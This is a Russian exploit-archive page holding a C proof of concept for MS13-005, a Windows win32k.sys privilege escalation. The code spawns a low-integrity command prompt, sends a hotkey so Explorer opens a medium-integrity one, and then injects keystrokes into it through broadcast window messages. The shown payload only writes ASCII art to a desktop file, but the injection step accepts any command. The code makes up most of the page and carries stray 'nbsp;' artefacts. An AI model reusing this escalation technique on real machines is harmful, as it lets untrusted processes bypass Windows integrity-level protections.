MS13-005 (win32k.sys) exploit POC

Свойства

Дата публикации:
08.02.2013
Цель:
Microsoft Windows
Тип воздействия:
Повышение привилегий
Описание уязвимости:
Повышение привилегий в Microsoft Windows

Код

MS13-005 (win32k.sys)
The vulnerability could allow elevation of privilege if an attacker runs a specially crafted application.
This security update is rated Important for all supported editions of Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
Windows 8, Windows Server 2012, and Windows RT. For more information, see the subsection, Affected and Non-Affected Software, in this section.



include <windows.h>
#include <stdio.h>
int main()
{
nbsp;  STARTUPINFO si = {0};
nbsp;  PROCESS_INFORMATION pi = {0};
nbsp;  PCHAR payload[] = {
nbsp;      "echo \".___ _____ ______________ ______________ \"> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"| | / \\ \\__ ___/ | \\_ _____/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"| |/ \\ / \\ | | / ~ \\ __)_ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"| / Y \\ | | \\ Y / \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"|___\\____|__ / |____| \\___|_ /_______ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \" \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \" _______ .___ ________ ________ _____ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \" \\ \\ | |/ _____/ / _____/ / _ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \" / | \\| / \\ ___/ \\ ___ / /_\\ \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"/ | \\ \\ \\_\\ \\ \\_\\ \\/ | \\ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \"\\____|__ /___|\\______ /\\______ /\\____|__ / \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "echo \" \\/ \\/ \\/ \\/ \">> %USERPROFILE%\\Desktop\\TROLOLOL",
nbsp;      "exit",
nbsp;      NULL
nbsp;  };
nbsp;  printf("1] Spawning a low IL cmd.exe (from a low IL process)..Rdy ? Press to continue\n");
nbsp;  getchar();
nbsp;  si.cb = sizeof(si);
nbsp;  CreateProcess(
nbsp;      NULL,
nbsp;      "cmd.exe",
nbsp;      NULL,
nbsp;      NULL,
nbsp;      TRUE,
nbsp;      CREATE_NEW_CONSOLE,
nbsp;      NULL,
nbsp;      NULL,
nbsp;      &si,
nbsp;      &pi
nbsp;  );
nbsp;  Sleep(1000);
nbsp;  // Yeah, you can "bruteforce" the index of the window..
nbsp;  printf("2] Use Win+Shift+7 to ask explorer.exe to spawn a cmd.exe MI..");
nbsp;  keybd_event(VK_LWIN, 0x5B, 0, 0);
nbsp;  keybd_event(VK_LSHIFT, 0xAA, 0, 0);
nbsp;  keybd_event(0x37, 0x87, 0, 0);
nbsp;  keybd_event(VK_LWIN, 0x5B, KEYEVENTF_KEYUP, 0);
nbsp;  keybd_event(VK_LSHIFT, 0xAA, KEYEVENTF_KEYUP, 0);
nbsp;  keybd_event(0x37, 0x87, KEYEVENTF_KEYUP, 0);
nbsp;  Sleep(1000);
nbsp;  printf("3] Killing now the useless low IL cmd.exe..\n");
nbsp;  TerminateProcess(
nbsp;      pi.hProcess,
nbsp;      1337
nbsp;  );
nbsp;
nbsp;  printf("4] Now driving the medium IL cmd.exe with SendMessage and HWND_BROADCAST (WM_CHAR)\n");
nbsp;  printf(" \"Drive the command prompt [..] to make it look like a scene from a Hollywood movie.\" <- That's what we're going to do!\n");
nbsp;  for(unsigned int i = 0; payload[i] != NULL; ++i)
nbsp;  {
nbsp;      for(unsigned int j = 0; j < strlen(payload[i]); ++j)
nbsp;      {
nbsp;          // Yeah, that's the fun part to watch ;D
nbsp;          Sleep(10);
nbsp;          SendMessage(
nbsp;              HWND_BROADCAST,
nbsp;              WM_CHAR,
nbsp;              payload[i][j],
nbsp;              0
nbsp;          );
nbsp;      }
nbsp;      SendMessage(
nbsp;          HWND_BROADCAST,
nbsp;          WM_CHAR,
nbsp;          VK_RETURN,
nbsp;          0
nbsp;      );
nbsp;  }
nbsp;  return EXIT_SUCCESS;
}

http://dualcoremusic.com/nerdcore/music/
Tags: exploit, poc, win32k.sys, windows


GPS STUxFF *>*:: Russia, Moscow
{{{Mind Wave}}}[#sudo]:: working
Mp3z:[$whoami]#-:: Dual Core - Here to Help (ft Remington Forbes)

или введите имя

CAPTCHA